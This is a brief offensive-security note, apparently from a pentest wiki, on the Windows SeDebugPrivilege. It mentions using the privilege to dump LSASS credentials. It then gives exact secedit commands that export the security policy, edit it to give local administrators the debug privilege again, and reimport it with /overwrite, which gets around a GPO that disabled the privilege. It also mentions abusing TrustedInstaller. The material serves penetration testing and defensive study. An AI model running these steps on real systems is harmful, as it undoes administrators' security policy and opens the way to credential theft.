SeDebugPrivilege
27.08.2023 ยท dadevel
A Windows Privileges that allows to access the memory of any process and therefore escalation to local admin, e.g. by dumping LSASS.
Untested tools:
GPO Bypass
The debug privilege can be disabled globally via a GPO, but this restriction can be bypassed.
Run whoami /priv
as local admin and notice that SeDebugPrivilege
is missing.
Export the current security policy to a file.
secedit.exe /export /cfg secpolicy.inf /areas USER_RIGHTS
Edit secpolicy.inf
to look like the following:
...
[Privilege Rights]
SeDebugPrivilege = *S-1-5-32-544
...
This allows the group of local administrators to use the debug privilege again.
Import the modified policy.
echo J | secedit.exe /configure /db secedit.sdb /cfg secpolicy.inf /overwrite /areas USER_RIGHTS
In order for the changes to take effect you must log out and log in again. The changes will stay in effect until the next GPO update cycle.
Alternatively you can abuse TrustedInstaller. It always has the debug privilege.